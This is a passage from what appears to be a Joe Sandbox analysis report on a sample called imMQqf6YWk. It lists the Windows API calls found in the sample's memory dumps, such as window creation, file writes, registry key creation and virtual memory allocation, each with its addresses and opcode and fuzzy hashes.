                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ExtentPointText
                                                                              • String ID:
                                                                              • API String ID: 566491939-0
                                                                              • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                              • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                              • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                              • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                              APIs
                                                                              • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                              • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                              • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                              • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                              APIs
                                                                              • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                              • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                              • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                              • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                              APIs
                                                                              • FindClose.KERNEL32(00000000,000000FF,004707E0,00000000,004715F6,?,00000000,0047163F,?,00000000,00471778,?,00000000,?,00000000), ref: 00454C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFind
                                                                              • String ID:
                                                                              • API String ID: 1863332320-0
                                                                              • Opcode ID: 7c8f6db93596433e8c6540ce52a48f0da3b0448ecaf471e45e9c42032ee7c2dc
                                                                              • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                              • Opcode Fuzzy Hash: 7c8f6db93596433e8c6540ce52a48f0da3b0448ecaf471e45e9c42032ee7c2dc
                                                                              • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(00495556,?,00495578,?,?,00000000,00495556,?,?), ref: 0041469B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                              • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                              • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                              • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                              • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                              • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                              • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                              APIs
                                                                                • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                              • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 3202724764-0
                                                                              • Opcode ID: f1fbc87c7d3064a6cf4368d53b3e4c6ee974437194041f03c0195094467d5de5
                                                                              • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                              • Opcode Fuzzy Hash: f1fbc87c7d3064a6cf4368d53b3e4c6ee974437194041f03c0195094467d5de5
                                                                              • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                              APIs
                                                                              • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow
                                                                              • String ID:
                                                                              • API String ID: 530164218-0
                                                                              • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                              • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                              • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                              • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,0046769C,00000000,00000000,00000000,0000000C,00000000), ref: 004669CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                              • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                              • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                              • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                              • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                              • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                              • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                              • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                              • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                              • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                              APIs
                                                                              • SetEndOfFile.KERNEL32(?,?,0045C192,00000000,0045C31D,?,00000000,00000002,00000002), ref: 00450933
                                                                                • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,0049799C,00000001,00000000,00000002,00000000,00497AFD,?,?,00000005,00000000,00497B31), ref: 004506B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 734332943-0
                                                                              • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                              • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                              • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                              • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                              APIs
                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,?,0049792A,00000000,00497AFD,?,?,00000005,00000000,00497B31,?,?,00000000), ref: 004072B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory
                                                                              • String ID:
                                                                              • API String ID: 1611563598-0
                                                                              • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                              • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                              • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                              • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                              • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                              • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                              • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID:
                                                                              • API String ID: 3375834691-0
                                                                              • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                              • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                              • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                              • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4b311c6ba27037e114d2a0e0a4cc9575de8b4ed7f96be8eb5d2287752a4e0dd9
                                                                              • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                              • Opcode Fuzzy Hash: 4b311c6ba27037e114d2a0e0a4cc9575de8b4ed7f96be8eb5d2287752a4e0dd9
                                                                              • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DA68,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DA22
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 626452242-0
                                                                              • Opcode ID: f00937e419430fadacdfb08ba868c06bfaea8747007b4ff93a078d6954f67ca3
                                                                              • Instruction ID: f29de2ad8c50687240b36adc22138c5273adba91495e2343049bdb371ee5aac2
                                                                              • Opcode Fuzzy Hash: f00937e419430fadacdfb08ba868c06bfaea8747007b4ff93a078d6954f67ca3
                                                                              • Instruction Fuzzy Hash: A051B6B0A14214AFDB10DF54D8C4B9ABBF8EF19308F108077E944A7391D738AE45CB6A
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                              • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                              • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                              • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                              • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                              • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                              • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003D94,00007D97,00401973), ref: 00401766
                                                                              Memory Dump Source
